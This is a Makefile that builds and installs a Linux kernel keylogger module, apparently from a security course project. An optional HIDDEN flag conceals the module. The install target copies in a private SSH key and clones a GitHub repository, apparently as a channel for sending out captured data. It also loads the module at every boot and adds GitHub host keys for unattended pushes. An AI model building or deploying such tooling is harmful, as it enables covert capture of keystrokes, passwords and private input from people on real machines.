modname := keylog
obj-m := $(modname).o

keylog-objs := keylog.o

KVERSION = $(shell uname -r)
KDIR := /lib/modules/$(KVERSION)/build

KCPPFLAGS=""

ifdef HIDDEN
KCPPFLAGS+="-DHIDE_MODULE -DBUFLEN=2048"
endif

ifdef debug
KCPPFLAGS+="-DDEBUG"
endif

# rmdir /lib/modules/$(KVERSION)/misc/$(modname)

all:
	make -C $(KDIR) M=$(PWD) modules

clean:
	make -C $(KDIR) M=$(PWD) clean

load:
	-rmmod $(modname)
	insmod $(modname).ko

unload:
	-rmmod $(modname)

install:
	git clone https://github.com/Sad-0w/CS564_data.git /etc/keylog
	cp ../scripts/run_update.sh /etc/keylog
	cp ../git_id_rsa /etc/keylog
	gcc manager.c -o /etc/keylog/manager.o
	mkdir -p /lib/modules/$(KVERSION)/misc/$(modname)
	install -m 0755 -o root -g root $(modname).ko /lib/modules/$(KVERSION)
	echo $(modname) > /etc/modules-load.d/$(modname).conf
	insmod $(modname).ko
	echo "github.com ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMqqnkVzrm0SdG6UOoqKLsabgH5C9okWi0dh2l9GKJl">> ~/.ssh/known_hosts
	echo "github.com ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEmKSENjQEezOmxkZMy7opKgwFB9nkt5YRrYMjNuG5N87uRgg6CLrbo5wAdT/y6v0mKV0U2w0WZ2YB/++Tpockg=">> ~/.ssh/known_hosts
	echo "github.com ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCj7ndNxQowgcQnjshcLrqPEiiphnt+VTTvDP6mHBL9j1aNUkY4Ue1gvwnGLVlOhGeYrnZaMgRK6+PKCUXaDbC7qtbW8gIkhL7aGCsOr/C56SJMy/BCZfxd1nWzAOxSDPgVsmerOBYfNqltV9/hWCqBywINIR+5dIg6JTJ72pcEpEjcYgXkE2YEFXV1JHnsKgbLWNlhScqb2UmyRkQyytRLtL+38TGxkxCflmO+5Z8CSSNY7GidjMIZ7Q4zMjA2n1nGrlTDkzwDCsw+wqFPGQA179cnfGWOWRVruj16z6XyvxvjJwbz0wQZ75XK5tKSb7FNyeIEs4TT4jk+S4dhPeAUC5y+bDYirYgM4GC7uEnztnZyaVWQ7B381AK4Qdrwt51ZqExKbQpTUNn+EjqoTwvqNj4kqx5QUCI0ThS/YkOxJCXmPUWZbhjpCg56i+2aB6CmK2JGhn57K5mj0MNdBXA4/WnwH6XoPWJzK5Nyu2zB3nAZp+S5hpQs+p1vN1/wsjk=" >> ~/.ssh/known_hosts
	depmod -a


uninstall:
	rm /lib/modules/$(KVERSION)/$(modname).ko
	rm -rf /etc/keylog
	depmod -a
	rmmod $(modname)
	rm -rf /sys/kernel/debug/keylog
	rm /etc/modules-load.d/$(modname).conf
